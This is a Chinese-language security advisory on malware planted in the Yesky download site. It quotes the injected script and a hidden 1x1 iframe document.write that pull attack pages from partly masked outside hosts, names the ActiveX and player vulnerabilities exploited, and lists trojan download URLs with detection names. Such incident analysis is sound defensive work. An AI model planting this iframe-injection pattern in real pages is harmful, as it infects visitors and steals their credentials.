天极网下载频道网站挂马事件
3月20日,安天实验室发现,天极网下载频道(http://download.yesky.com/)
被黑客植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意
程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。
该网站问题代码:
src=http: "//www.my****.com/TLimages/mydown/js/weekurl.js"
http://www.my****.com/TLimages/mydown/js/weekurl.js
问题框架代码:
document.write("<iframe src=http:\/\/date.31****.net\
/my.html width=1 height=1><\/iframe>");
http://date.31****.net/my.html
问题框架代码:
<iframe src="news1.html" width=100 height=0></iframe>
http://date.31****.net/news1.html加密网马代码:
news1.html网马解密后可知该网马利用以下漏洞来传播:
MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞
暴风影音播放器MPS.StormPlayer漏洞
REALPLAY播放器IERPCtl.IERPCtl.1漏洞
迅雷ActiveX控件DownURL2方式远程缓冲区溢出漏洞
百度搜霸漏洞
当用户访问http://download.yesky.com/ 时,
系统会自动下载以下病毒文件:
http://dd1.1a2****.com/down/1.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rkf)
http://dd1.1a2****.com/down/2.exe
病毒名:(Trojan-PSW.Win32.OnLineGame. rkf)
http://dd1.1a2****.com/down/3.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rkf)
http://dd1.1a2****.com/down/4.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.tzt)
http://dd1.1a2****.com/down/5.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rkf)
http://dd1.1a2****.com/down/6.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rkf)
http://dd1.1a2****.com/down/7.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.tzt)
http://dd1.1a2****.com/down/8.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.uay)
http://dd1.1a2****.com/down/9.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.tmj)
http://dd1.1a2****.com/down/10.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.uay)
http://dd1.1a2****.com/down/11.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.uay)
http://dd1.1a2****.com/down/12.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.tmj)
http://dd1.1a2****.com/down/13.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.tmj)
http://dd1.1a2****.com/down/14.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.sem)
http://dd1.1a2****.com/down/15.exe
病毒名:(Trojan-PSW.Win32.Lmir.bpv)
http://dd1.1a2****.com/down/16.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.sem)
http://dd1.1a2****.com/down/17.exe
病毒名:(Trojan.Win32.Agent.diq)
http://dd1.1a2****.com/down/18.exe
病毒名:(Trojan.Win32.Agent.diq)
http://dd1.1a2****.com/down/19.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rdx)
http://dd1.1a2****.com/down/20.exe
病毒名:(Trojan-PSW.Win32.QQPass.bha)
http://dd1.1a2****.com/down/21.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.tmj)
http://dd1.1a2****.com/down/22.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.tmj)
http://dd1.1a2****.com/down/23.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.ubc)
http://dd1.1a2****.com/down/24.exe
病毒名:(Trojan.Win32.Popwin.awj)
http://dd1.1a2****.com/down/25.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.tmj)
http://dd1.1a2****.com/down/26.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.tmj)
http://dd1.1a2****.com/down/27.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rdx)
http://dd1.1a2****.com/down/28.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rdx)
http://dd1.1a2****.com/down/29.exe
病毒名:(Trojan.Win32.Agent.hko)
http://dd1.1a2****.com/down/30.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rdx)
http://dd1.1a2****.com/down/31.exe
病毒名:(Trojan.Win32.Agent.diq)
http://dd1.1a2****.com/down/34.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rdx)
http://dd1.1a2****.com/down/36.exe
病毒名:(Backdoor.Win32.Popwin.awj)
以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会,盗取用户
敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。
您的位置: